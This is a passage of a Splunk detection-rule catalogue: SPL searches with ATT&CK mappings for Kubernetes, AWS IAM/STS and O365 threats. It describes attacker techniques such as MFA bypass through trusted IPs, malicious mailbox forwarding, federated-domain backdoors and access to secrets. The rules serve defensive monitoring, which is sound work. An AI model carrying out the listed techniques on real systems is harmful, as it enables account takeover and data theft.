`aws_cloudwatchlogs_eks` user.groups{}=system:serviceaccounts responseStatus.status = Failure | table sourceIPs{} user.username userAgent verb responseStatus.status requestURI | `kubernetes_aws_detect_service_accounts_forbidden_failure_access_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

This search can give false positives as there might be inherent issues with authentications and permissions at cluster.

Reference

Test Dataset

version: 1


Kubernetes aws detect suspicious kubectl calls

This search provides information on anonymous Kubectl calls with IP, verb namespace and object access context

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`aws_cloudwatchlogs_eks` userAgent=kubectl* sourceIPs{}!=127.0.0.1 sourceIPs{}!=::1 src_user=system:anonymous | table src_ip src_user verb userAgent requestURI | stats count by src_ip src_user verb userAgent requestURI |`kubernetes_aws_detect_suspicious_kubectl_calls_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Kubectl calls are not malicious by nature. However source IP, verb and Object can reveal potential malicious activity, specially anonymous suspicious IPs and sensitive objects such as configmaps or secrets

Reference

Test Dataset

version: 1


Kubernetes azure detect rbac authorization by account

This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding rare or top to see both extremes of RBAC by accounts occurrences

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-26

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search annotations.authorization.k8s.io/reason=* | table sourceIPs{} user.username userAgent annotations.authorization.k8s.io/reason |stats count by user.username annotations.authorization.k8s.io/reason | rare user.username annotations.authorization.k8s.io/reason |`kubernetes_azure_detect_rbac_authorization_by_account_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all RBAC Authorications are malicious. RBAC authorizations can uncover malicious activity specially if sensitive Roles have been granted.

Reference

Test Dataset

version: 1


Kubernetes azure detect most active service accounts by pod namespace

This search provides information on Kubernetes service accounts,accessing pods and namespaces by IP address and verb

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-26

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search user.groups{}=system:serviceaccounts* OR user.username=system.anonymous OR annotations.authorization.k8s.io/decision=allow | table sourceIPs{} user.username userAgent verb responseStatus.reason responseStatus.status properties.pod objectRef.namespace | top sourceIPs{} user.username verb responseStatus.status properties.pod objectRef.namespace |`kubernetes_azure_detect_most_active_service_accounts_by_pod_namespace_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all service accounts interactions are malicious. Analyst must consider IP and verb context when trying to detect maliciousness.

Reference

Test Dataset

version: 1


Kubernetes azure detect sensitive object access

This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-20

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search objectRef.resource=secrets OR configmaps user.username=system.anonymous OR annotations.authorization.k8s.io/decision=allow |table user.username user.groups{} objectRef.resource objectRef.namespace objectRef.name annotations.authorization.k8s.io/reason |dedup user.username user.groups{} |`kubernetes_azure_detect_sensitive_object_access_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Sensitive object access is not necessarily malicious but user and object context can provide guidance for detection.

Reference

Test Dataset

version: 1


Kubernetes azure detect sensitive role access

This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-20

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search objectRef.resource=clusterroles OR clusterrolebindings | table sourceIPs{} user.username user.groups{} objectRef.namespace requestURI annotations.authorization.k8s.io/reason | dedup user.username user.groups{} |`kubernetes_azure_detect_sensitive_role_access_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Sensitive role resource access is necessary for cluster operation, however source IP, namespace and user group may indicate possible malicious use.

Reference

Test Dataset

version: 1


Kubernetes azure detect service accounts forbidden failure access

This search provides information on Kubernetes service accounts with failure or forbidden access status

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-20

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search user.groups{}=system:serviceaccounts* responseStatus.reason=Forbidden | table sourceIPs{} user.username userAgent verb responseStatus.reason responseStatus.status properties.pod objectRef.namespace |`kubernetes_azure_detect_service_accounts_forbidden_failure_access_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

This search can give false positives as there might be inherent issues with authentications and permissions at cluster.

Reference

Test Dataset

version: 1


Kubernetes azure detect suspicious kubectl calls

This search provides information on rare Kubectl calls with IP, verb namespace and object access context

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-26

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | spath input=responseObject.metadata.annotations.kubectl.kubernetes.io/last-applied-configuration | search userAgent=kubectl* sourceIPs{}!=127.0.0.1 sourceIPs{}!=::1 | table sourceIPs{} verb userAgent user.groups{} objectRef.resource objectRef.namespace requestURI | rare sourceIPs{} verb userAgent user.groups{} objectRef.resource objectRef.namespace requestURI |`kubernetes_azure_detect_suspicious_kubectl_calls_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Kubectl calls are not malicious by nature. However source IP, verb and Object can reveal potential malicious activity, specially suspicious IPs and sensitive objects such as configmaps or secrets

Reference

Test Dataset

version: 1


Kubernetes azure pod scan fingerprint

This search provides information of unauthenticated requests via source IP user agent, request URI and response status data against Kubernetes cluster pod in Azure

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-05-20

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search responseStatus.code=401 | table sourceIPs{} userAgent verb requestURI responseStatus.reason properties.pod |`kubernetes_azure_pod_scan_fingerprint_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics

Required field

Kill Chain Phase

  • Reconnaissance


Known False Positives

Not all unauthenticated requests are malicious, but source IPs, userAgent, verb, request URI and response status will provide context.

Reference

Test Dataset

version: 1


Kubernetes azure scan fingerprint

This search provides information of unauthenticated requests via source IP user agent, request URI and response status data against Kubernetes cluster in Azure

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1526
  • Last Updated: 2020-05-19

Search

`kubernetes_azure` category=kube-audit | spath input=properties.log | search responseStatus.code=401 | table sourceIPs{} userAgent verb requestURI responseStatus.reason |`kubernetes_azure_scan_fingerprint_filter`

Associated Analytic Story


How To Implement

You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics

Required field

ATT&CK

ID Technique Tactic
T1526 Cloud Service Discovery Discovery


Kill Chain Phase

  • Reconnaissance


Known False Positives

Not all unauthenticated requests are malicious, but source IPs, userAgent, verb, request URI and response status will provide context.

Reference

Test Dataset

version: 1


Kubernetes gcp detect rbac authorizations by account

This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding top to see both extremes of RBAC by accounts occurrences

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-07-11

Search

`google_gcp_pubsub_message` data.labels.authorization.k8s.io/reason=ClusterRoleBinding OR Clusterrole | table src_ip src_user data.labels.authorization.k8s.io/decision data.labels.authorization.k8s.io/reason | rare src_user data.labels.authorization.k8s.io/reason |`kubernetes_gcp_detect_rbac_authorizations_by_account_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add on for GCP. This search works with pubsub messaging service logs

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all RBAC Authorications are malicious. RBAC authorizations can uncover malicious activity specially if sensitive Roles have been granted.

Reference

Test Dataset

version: 1


Kubernetes gcp detect most active service accounts by pod

This search provides information on Kubernetes service accounts,accessing pods by IP address, verb and decision

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-07-10

Search

`google_gcp_pubsub_message` data.protoPayload.request.spec.group{}=system:serviceaccounts | table src_ip src_user http_user_agent data.protoPayload.request.spec.nonResourceAttributes.verb data.labels.authorization.k8s.io/decision data.protoPayload.response.spec.resourceAttributes.resource | top src_ip src_user http_user_agent data.labels.authorization.k8s.io/decision data.protoPayload.response.spec.resourceAttributes.resource |`kubernetes_gcp_detect_most_active_service_accounts_by_pod_filter`

Associated Analytic Story


How To Implement

You must install splunk GCP add on. This search works with pubsub messaging service logs

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all service accounts interactions are malicious. Analyst must consider IP, verb and decision context when trying to detect maliciousness.

Reference

Test Dataset

version: 1


Kubernetes gcp detect sensitive object access

This search provides information on Kubernetes accounts accessing sensitve objects such as configmaps or secrets

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-07-11

Search

`google_gcp_pubsub_message` data.protoPayload.authorizationInfo{}.resource=configmaps OR secrets | table data.protoPayload.requestMetadata.callerIp src_user data.resource.labels.cluster_name data.protoPayload.request.metadata.namespace data.labels.authorization.k8s.io/decision | dedup data.protoPayload.requestMetadata.callerIp src_user data.resource.labels.cluster_name |`kubernetes_gcp_detect_sensitive_object_access_filter`

Associated Analytic Story


How To Implement

You must install splunk add on for GCP . This search works with pubsub messaging service logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Sensitive object access is not necessarily malicious but user and object context can provide guidance for detection.

Reference

Test Dataset

version: 1


Kubernetes gcp detect sensitive role access

This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-07-11

Search

`google_gcp_pubsub_message` data.labels.authorization.k8s.io/reason=ClusterRoleBinding OR Clusterrole dest=apis/rbac.authorization.k8s.io/v1 src_ip!=::1 | table src_ip src_user http_user_agent data.labels.authorization.k8s.io/decision data.labels.authorization.k8s.io/reason | dedup src_ip src_user |`kubernetes_gcp_detect_sensitive_role_access_filter`

Associated Analytic Story


How To Implement

You must install splunk add on for GCP. This search works with pubsub messaging servicelogs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Sensitive role resource access is necessary for cluster operation, however source IP, user agent, decision and reason may indicate possible malicious use.

Reference

Test Dataset

version: 1


Kubernetes gcp detect service accounts forbidden failure access

This search provides information on Kubernetes service accounts with failure or forbidden access status, this search can be extended by using top or rare operators to find trends or rarities in failure status, user agents, source IPs and request URI

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`google_gcp_pubsub_message` system:serviceaccounts data.protoPayload.response.status.allowed!=* | table src_ip src_user http_user_agent data.protoPayload.response.spec.resourceAttributes.namespace data.resource.labels.cluster_name data.protoPayload.response.spec.resourceAttributes.verb data.protoPayload.request.status.allowed data.protoPayload.response.status.reason data.labels.authorization.k8s.io/decision | dedup src_ip src_user | `kubernetes_gcp_detect_service_accounts_forbidden_failure_access_filter`

Associated Analytic Story


How To Implement

You must install splunk add on for GCP. This search works with pubsub messaging service logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

This search can give false positives as there might be inherent issues with authentications and permissions at cluster.

Reference

Test Dataset

version: 1


Kubernetes gcp detect suspicious kubectl calls

This search provides information on anonymous Kubectl calls with IP, verb namespace and object access context

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-07-11

Search

`google_gcp_pubsub_message` data.protoPayload.requestMetadata.callerSuppliedUserAgent=kubectl* src_user=system:unsecured OR src_user=system:anonymous | table src_ip src_user data.protoPayload.requestMetadata.callerSuppliedUserAgent data.protoPayload.authorizationInfo{}.granted object_path |dedup src_ip src_user |`kubernetes_gcp_detect_suspicious_kubectl_calls_filter`

Associated Analytic Story


How To Implement

You must install splunk add on for GCP. This search works with pubsub messaging logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Kubectl calls are not malicious by nature. However source IP, source user, user agent, object path, and authorization context can reveal potential malicious activity, specially anonymous suspicious IPs and sensitive objects such as configmaps or secrets

Reference

Test Dataset

version: 1


New container uploaded to aws ecr

This searches show information on uploaded containers including source user, image id, source IP user type, http user agent, region, first time, last time of operation (PutImage). These searches are based on Cloud Infrastructure Data Model.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1525
  • Last Updated: 2020-02-20

Search

| tstats count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Cloud_Infrastructure.Compute where Compute.user_type!="AssumeRole" AND Compute.http_user_agent="AWS Internal" AND Compute.event_name="PutImage" by Compute.image_id Compute.src_user Compute.src Compute.region Compute.msg Compute.user_type | `drop_dm_object_name("Compute")` | `new_container_uploaded_to_aws_ecr_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. You must also install Cloud Infrastructure data model. Please also customize the `container_implant_aws_detection_filter` macro to filter out the false positives.

Required field

ATT&CK

ID Technique Tactic
T1525 Implant Container Image Persistence


Kill Chain Phase

Known False Positives

Uploading container is a normal behavior from developers or users with access to container registry.

Reference

Test Dataset

version: 1


O365 add app role assignment grant user

This search detects the creation of a new Federation setting by alerting about an specific event related to its creation.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1136.003
  • Last Updated: 2021-01-26

Search

`o365_management_activity` Workload=AzureActiveDirectory Operation="Add app role assignment grant to user." | stats count min(_time) as firstTime max(_time) as lastTime values(Actor{}.ID) as Actor.ID values(Actor{}.Type) as Actor.Type by ActorIpAddress dest ResultStatus | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_add_app_role_assignment_grant_user_filter`

Associated Analytic Story


How To Implement

You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity

Required field

ATT&CK

ID Technique Tactic
T1136.003 Cloud Account Persistence


Kill Chain Phase

  • Actions on Objective


Known False Positives

The creation of a new Federation is not necessarily malicious, however this events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a different cloud provider.

Reference


Test Dataset


version: 1


O365 added service principal

This search detects the creation of a new Federation setting by alerting about an specific event related to its creation.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1136.003
  • Last Updated: 2021-01-26

Search

`o365_management_activity` Workload=AzureActiveDirectory signature="Add service principal credentials." | stats min(_time) as firstTime max(_time) as lastTime values(Actor{}.ID) as Actor.ID values(ModifiedProperties{}.Name) as ModifiedProperties.Name values(ModifiedProperties{}.NewValue) as ModifiedProperties.NewValue values(Target{}.ID) as Target.ID by ActorIpAddress signature | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_added_service_principal_filter`

Associated Analytic Story


How To Implement

You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity

Required field

ATT&CK

ID Technique Tactic
T1136.003 Cloud Account Persistence


Kill Chain Phase

  • Actions on Objective


Known False Positives

The creation of a new Federation is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a different cloud provider.

Reference


Test Dataset


version: 1


O365 bypass mfa via trusted ip

This search detects newly added IP addresses/CIDR blocks to the list of MFA Trusted IPs to bypass multi factor authentication. Attackers are often known to use this technique so that they can bypass the MFA system.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1562.007
  • Last Updated: 2021-01-12

Search

`o365_management_activity` signature="Set Company Information." ModifiedProperties{}.Name=StrongAuthenticationPolicy | rex max_match=100 field=ModifiedProperties{}.NewValue "(?<ip_addresses_new_added>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\/\d{1,2})" | rex max_match=100 field=ModifiedProperties{}.OldValue "(?<ip_addresses_old>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\/\d{1,2})" | eval ip_addresses_old=if(isnotnull(ip_addresses_old),ip_addresses_old,"0") | mvexpand ip_addresses_new_added | where isnull(mvfind(ip_addresses_old,ip_addresses_new_added)) |stats count min(_time) as firstTime max(_time) as lastTime values(ip_addresses_old) as ip_addresses_old by user ip_addresses_new_added signature vendor_product vendor_account status user_id action | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_bypass_mfa_via_trusted_ip_filter`

Associated Analytic Story


How To Implement

You must install Splunk Microsoft Office 365 add-on. This search works with o365:management:activity

Required field

ATT&CK

ID Technique Tactic
T1562.007 Disable or Modify Cloud Firewall Defense Evasion


Kill Chain Phase

  • Actions on Objective


Known False Positives

Unless it is a special case, it is uncommon to continually update Trusted IPs to MFA configuration.

Reference


Test Dataset


version: 1


O365 disable mfa

This search detects when multi factor authentication has been disabled, what entitiy performed the action and against what user

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1556
  • Last Updated: 2020-12-16

Search

`o365_management_activity` Operation="Disable Strong Authentication." | stats count earliest(_time) as firstTime latest(_time) as lastTime by UserType Operation user status signature dest ResultStatus |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_disable_mfa_filter`

Associated Analytic Story


How To Implement

You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity

Required field

ATT&CK

ID Technique Tactic
T1556 Modify Authentication Process Credential Access, Defense Evasion


Kill Chain Phase

  • Actions on Objective


Known False Positives

Unless it is a special case, it is uncommon to disable MFA or Strong Authentication

Reference


Test Dataset


version: 1


O365 excessive authentication failures alert

This search detects when an excessive number of authentication failures occur this search also includes attempts against MFA prompt codes

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1110
  • Last Updated: 2020-12-16

Search

`o365_management_activity` Workload=AzureActiveDirectory UserAuthenticationMethod=* status=Failed | stats count earliest(_time) as firstTime latest(_time) values(UserAuthenticationMethod) AS UserAuthenticationMethod values(UserAgent) AS UserAgent values(status) AS status values(src_ip) AS src_ip by user | where count > 10 |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_excessive_authentication_failures_alert_filter`

Associated Analytic Story


How To Implement

You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity

Required field

ATT&CK

ID Technique Tactic
T1110 Brute Force Credential Access


Kill Chain Phase

  • Not Applicable


Known False Positives

The threshold for alert is above 10 attempts and this should reduce the number of false positives.

Reference


Test Dataset


version: 1


O365 excessive sso logon errors

This search detects accounts with high number of Single Sign ON (SSO) logon errors. Excessive logon errors may indicate attempts to bruteforce of password or single sign on token hijack or reuse.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1556
  • Last Updated: 2021-01-26

Search

`o365_management_activity` Workload=AzureActiveDirectory LogonError=SsoArtifactInvalidOrExpired | stats count min(_time) as firstTime max(_time) as lastTime by LogonError ActorIpAddress UserAgent UserId | where count > 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_excessive_sso_logon_errors_filter`

Associated Analytic Story


How To Implement

You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity

Required field

ATT&CK

ID Technique Tactic
T1556 Modify Authentication Process Credential Access, Defense Evasion


Kill Chain Phase

  • Actions on Objective


Known False Positives

Logon errors may not be malicious in nature however it may indicate attempts to reuse a token or password obtained via credential access attack.

Reference


Test Dataset


version: 1


O365 new federated domain added

This search detects the addition of a new Federated domain.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1136.003
  • Last Updated: 2021-01-26

Search

`o365_management_activity` Workload=Exchange Operation="Add-FederatedDomain" | stats count min(_time) as firstTime max(_time) as lastTime values(Parameters{}.Value) as Parameters.Value by ObjectId Operation OrganizationName OriginatingServer UserId UserKey | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_federated_domain_added_filter`

Associated Analytic Story


How To Implement

You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity.

Required field

ATT&CK

ID Technique Tactic
T1136.003 Cloud Account Persistence


Kill Chain Phase

  • Actions on Objective


Known False Positives

The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider.

Reference


Test Dataset


version: 1


O365 pst export alert

This search detects when a user has performed an Ediscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1114
  • Last Updated: 2020-12-16

Search

`o365_management_activity` Category=ThreatManagement Name="eDiscovery search started or exported" | stats count earliest(_time) as firstTime latest(_time) as lastTime by Source Severity AlertEntityId Operation Name |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_pst_export_alert_filter`

Associated Analytic Story


How To Implement

You must install splunk Microsoft Office 365 add-on. This search works with o365:management:activity

Required field

ATT&CK

ID Technique Tactic
T1114 Email Collection Collection


Kill Chain Phase

  • Actions on Objective


Known False Positives

PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored.

Reference


Test Dataset


version: 1


O365 suspicious admin email forwarding

This search detects when an admin configured a forwarding rule for multiple mailboxes to the same destination.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1114.003
  • Last Updated: 2020-12-16

Search

`o365_management_activity` Operation=Set-Mailbox | spath input=Parameters | rename Identity AS src_user | search ForwardingAddress=* | stats dc(src_user) AS count_src_user earliest(_time) as firstTime latest(_time) as lastTime values(src_user) AS src_user values(user) AS user by ForwardingAddress | where count_src_user > 1 |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`o365_suspicious_admin_email_forwarding_filter`

Associated Analytic Story


How To Implement

Required field

ATT&CK

ID Technique Tactic
T1114.003 Email Forwarding Rule Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

unknown

Reference

Test Dataset


version: 1


O365 suspicious rights delegation

This search detects the assignment of rights to accesss content from another mailbox. This is usually only assigned to a service account.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1114.002
  • Last Updated: 2020-12-15

Search

`o365_management_activity` Operation=Add-MailboxPermission | spath input=Parameters | rename User AS src_user, Identity AS dest_user | search AccessRights=FullAccess OR AccessRights=SendAs OR AccessRights=SendOnBehalf | stats count earliest(_time) as firstTime latest(_time) as lastTime by user src_user dest_user Operation AccessRights |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`o365_suspicious_rights_delegation_filter`

Associated Analytic Story


How To Implement

Required field

ATT&CK

ID Technique Tactic
T1114.002 Remote Email Collection Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Service Accounts

Reference

Test Dataset


version: 1


O365 suspicious user email forwarding

This search detects when multiple user configured a forwarding rule to the same destination.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1114.003
  • Last Updated: 2020-12-16

Search

`o365_management_activity` Operation=Set-Mailbox | spath input=Parameters | rename Identity AS src_user | search ForwardingSmtpAddress=* | stats dc(src_user) AS count_src_user earliest(_time) as firstTime latest(_time) as lastTime values(src_user) AS src_user values(user) AS user by ForwardingSmtpAddress | where count_src_user > 1 |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`o365_suspicious_user_email_forwarding_filter`

Associated Analytic Story


How To Implement

Required field

ATT&CK

ID Technique Tactic
T1114.003 Email Forwarding Rule Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

unknown

Reference

Test Dataset


version: 1


Aws detect attach to role policy

This search provides detection of an user attaching itself to a different role trust policy. This can be used for lateral movement and escalation of privileges.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-07-27

Search

`aws_cloudwatchlogs_eks` attach policy | spath requestParameters.policyArn | table sourceIPAddress user_access_key userIdentity.arn userIdentity.sessionContext.sessionIssuer.arn eventName errorCode errorMessage status action requestParameters.policyArn userIdentity.sessionContext.attributes.mfaAuthenticated userIdentity.sessionContext.attributes.creationDate | `aws_detect_attach_to_role_policy_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add-on and Splunk App for AWS. This search works with cloudwatch logs

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

Attach to policy can create a lot of noise. This search can be adjusted to provide specific values to identify cases of abuse (i.e status=failure). The search can provide context for common users attaching themselves to higher privilege policies or even newly created policies.

Reference

Test Dataset

version: 1


Aws detect permanent key creation

This search provides detection of accounts creating permanent keys. Permanent keys are not created by default and they are only needed for programmatic calls. Creation of Permanent key is an important event to monitor.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-07-27

Search

`aws_cloudwatchlogs_eks` CreateAccessKey | spath eventName | search eventName=CreateAccessKey "userIdentity.type"=IAMUser | table sourceIPAddress userName userIdentity.type userAgent action status responseElements.accessKey.createDate responseElements.accessKey.status responseElements.accessKey.accessKeyId |`aws_detect_permanent_key_creation_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

Not all permanent key creations are malicious. If there is a policy of rotating keys this search can be adjusted to provide better context.

Reference

Test Dataset

version: 1


Aws detect role creation

This search provides detection of role creation by IAM users. Role creation is an event by itself if user is creating a new role with trust policies different than the available in AWS and it can be used for lateral movement and escalation of privileges.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-07-27

Search

`aws_cloudwatchlogs_eks` event_name=CreateRole action=created userIdentity.type=AssumedRole requestParameters.description=Allows* | table sourceIPAddress userIdentity.principalId userIdentity.arn action event_name awsRegion http_user_agent mfa_auth msg requestParameters.roleName requestParameters.description responseElements.role.arn responseElements.role.createDate | `aws_detect_role_creation_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add-on and Splunk App for AWS. This search works with cloudwatch logs

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

CreateRole is not very common in common users. This search can be adjusted to provide specific values to identify cases of abuse. In general AWS provides plenty of trust policies that fit most use cases.

Reference

Test Dataset

version: 1


Aws detect sts assume role abuse

This search provides detection of suspicious use of sts:AssumeRole. These tokens can be created on the go and used by attackers to move laterally and escalate privileges.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-07-27

Search

`cloudtrail` user_type=AssumedRole userIdentity.sessionContext.sessionIssuer.type=Role | table sourceIPAddress userIdentity.arn user_agent user_access_key status action requestParameters.roleName responseElements.role.roleName responseElements.role.createDate | `aws_detect_sts_assume_role_abuse_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add on and Splunk App for AWS. This search works with cloudtrail logs

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

Sts:AssumeRole can be very noisy as it is a standard mechanism to provide cross account and cross resources access. This search can be adjusted to provide specific values to identify cases of abuse.

Reference

Test Dataset

version: 1


Aws detect sts get session token abuse

This search provides detection of suspicious use of sts:GetSessionToken. These tokens can be created on the go and used by attackers to move laterally and escalate privileges.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1550
  • Last Updated: 2020-07-27

Search

